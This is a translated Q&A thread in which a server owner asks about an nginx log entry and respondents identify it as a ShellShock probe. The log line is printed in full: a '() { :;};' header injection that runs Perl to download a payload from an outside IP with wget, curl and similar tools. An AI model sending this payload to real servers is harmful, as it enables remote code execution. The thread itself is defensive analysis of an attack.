在nginx访问日志中有很多条目。 我如何知道这些脚本的结果,以及我的服务器是否被盗用?
162.232.183.48 - - [14/Jan/2016:10:54:57 +0000] "GET /cgi-bin/php4 HTTP/1.1" 200 1494 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://2 04.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232 .209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \x22);'" "-" 注意魔术string() { :; }; () { :; }; 。 他们试图捅一下,看看你的服务器是否容易受到ShellShock的攻击 。 这里用Perl来打印,看看攻击是否成功。
testing你的服务器是否容易受到ShellShock的攻击 。 如果不是,你很清楚。
另请参阅: 我的服务器是否易受perl漏洞攻击?
他正在寻找对你的攻击。 有趣的是,他错误configuration了他的攻击。 我做恶意软件捕获,他的wget / fetch / etc失败,因为他的包不在那里:-)